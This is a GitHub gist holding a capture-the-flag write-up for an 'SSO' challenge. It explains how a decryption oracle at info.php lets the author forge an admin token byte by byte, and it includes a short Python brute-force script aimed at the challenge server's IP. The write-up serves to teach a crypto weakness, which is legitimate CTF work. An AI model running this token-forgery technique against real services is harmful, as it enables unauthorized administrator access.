Skip to content

Instantly share code, notes, and snippets.

@HoLyVieR

HoLyVieR/gist:7a4e234907484062c751

Created December 31, 2014 17:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save HoLyVieR/7a4e234907484062c751 to your computer and use it in GitHub Desktop.
Save HoLyVieR/7a4e234907484062c751 to your computer and use it in GitHub Desktop.
Download ZIP
Writeup SSO
Raw
gistfile1.md

The encryption used was done character by character and we could decrypt any token of our choice with the "info.php" page. With this in mind, we could bruteforce each character individually until we get the character of our choice once decrypted. This would then let us craft a token with the value of our choice. Here's an example of a decrypted token that worked :

{"User":"admin","Admin":1}

Code

import httplib

target = '{"User":"admin","Admin":1}'
conn = httplib.HTTPConnection('188.40.18.87:5144')

def getvalue(token):
  conn.request('GET', 'http://188.40.18.87:5144/info.php?token=%s' % (token), "")
  return conn.getresponse().read()

# We get this part of the token by simply using a token generated for any user
token = "69222e97316b9dd8f7"

for j in range(len(token) / 2, len(target)):
  for i in range(256):
    h = hex(i)[2:]
    if len(h) == 1:
      h = "0" + h
    
    r = getvalue(token + h)
    
    if r == target[:len(r)]:
      token += h
      break
 
  print(token)

Then we had to visit "http://188.40.18.87:5144/admin.php?token=INSERT_TOKEN_HERE".

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment